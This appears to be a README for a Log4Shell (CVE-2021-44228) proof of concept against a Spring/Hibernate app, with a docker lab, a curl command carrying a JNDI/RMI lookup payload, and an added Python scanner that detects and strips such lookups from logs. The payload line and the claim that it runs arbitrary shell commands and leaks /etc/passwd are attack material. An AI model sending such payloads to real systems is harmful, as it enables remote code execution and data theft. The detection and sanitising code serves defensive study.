uint0/cve-2021-44228--spring-hibernate

CVE-2021-44228 POC - Spring / Hibernate

This POC uses Spring / Hibernate; however, a similar approach (RMI -> deserialization) could be used to trigger any deserialization vulnerability.

TL;DR

$ docker-compose up
$ curl -X POST -H 'Content-Type: text/plain' localhost:8080 --data-binary '${jndi:rmi://exploit:10000/a}'

You should see the contents of the victim's /etc/passwd appear in the logs of the attacker container. You can replace the command in the exploit service to run any shell command on the victim.

Victim

The victim is running a standard starter Spring app with the "Spring Data JPA" (for Hibernate), "Spring Web", and "H2" (as a data store) dependencies. Only 2 modifications have been made on top of this:

  1. Removed tests
  2. Replaced the slf4j logger with the vulnerable log4j

All dependencies are up to date. There are no magic flags enabled.

The victim exposes a POST-able endpoint on / which will log the request.
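Because the endpoint above writes the raw request body straight into a log statement, the defensive question is how to spot a JNDI lookup string before or after it reaches the logger. The following Python example is added here and is not part of the repository: it scans constructed log lines for the `${jndi:<scheme>://host:port/...}` form that the TL;DR request uses, extracts the scheme and host/port a responder would want to block or egress-filter, and offers a `sanitize_for_log` helper that neutralises the lookup before logging. The sample lines and the `203.0.113.5` address are constructed test data.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Matches a plain Log4j JNDI lookup such as ${jndi:rmi://host:port/name}.
# Only the literal, unobfuscated form is handled; treat hits as triage
# signal, not as proof that a host is clean when nothing matches.
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:\s*//\s*"
    r"(?P<host>[^:/\s}]+)(?::(?P<port>\d+))?(?P<path>[^}]*)\}",
    re.IGNORECASE,
)

# Constructed sample log lines in the shape the victim's POST handler would
# emit (assumption: one line per request with the body echoed after "body=").
SAMPLE_LOG = [
    "2021-12-10 12:00:01 INFO  POST / body=hello world",
    "2021-12-10 12:00:02 INFO  POST / body=${jndi:rmi://exploit:10000/a}",
    "2021-12-10 12:00:03 INFO  POST / body=${JNDI:ldap://203.0.113.5:1389/x}",
    "2021-12-10 12:00:04 INFO  POST / body=total is $100, thanks",
]


@dataclass
class Finding:
    line_no: int          # 1-based line number in the scanned input
    scheme: str           # rmi, ldap, ldaps, dns, ...
    host: str             # host the victim JVM would be made to connect to
    port: Optional[int]   # None when the lookup omits an explicit port
    raw: str              # the full matched lookup string


def find_jndi_lookups(lines: List[str]) -> List[Finding]:
    """Return one Finding per JNDI lookup found in the given log lines."""
    findings: List[Finding] = []
    for line_no, line in enumerate(lines, start=1):
        for m in JNDI_LOOKUP.finditer(line):
            port = int(m.group("port")) if m.group("port") else None
            findings.append(
                Finding(line_no, m.group("scheme").lower(), m.group("host"), port, m.group(0))
            )
    return findings


def is_safe_to_log(body: str) -> bool:
    """True when the request body carries no literal JNDI lookup."""
    return JNDI_LOOKUP.search(body) is None


def sanitize_for_log(body: str) -> str:
    """Replace any JNDI lookup with an inert marker before the body is logged."""
    return JNDI_LOOKUP.sub("[JNDI-LOOKUP-REMOVED]", body)


if __name__ == "__main__":
    for f in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.scheme} lookup to {f.host}:{f.port} ({f.raw})")
    print(sanitize_for_log("total ${jndi:rmi://exploit:10000/a} done"))
```

The scan is a detection aid only: the actual remediation for CVE-2021-44228 is upgrading Log4j to a fixed release, and the regex deliberately covers just the literal form so that a miss is never read as an all-clear.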

Exploit

The exploit relies on a fork of ysoserial using the Hibernate exploit generator. In order for the exploit to work with the latest version of Hibernate, ysoserial must be recompiled.
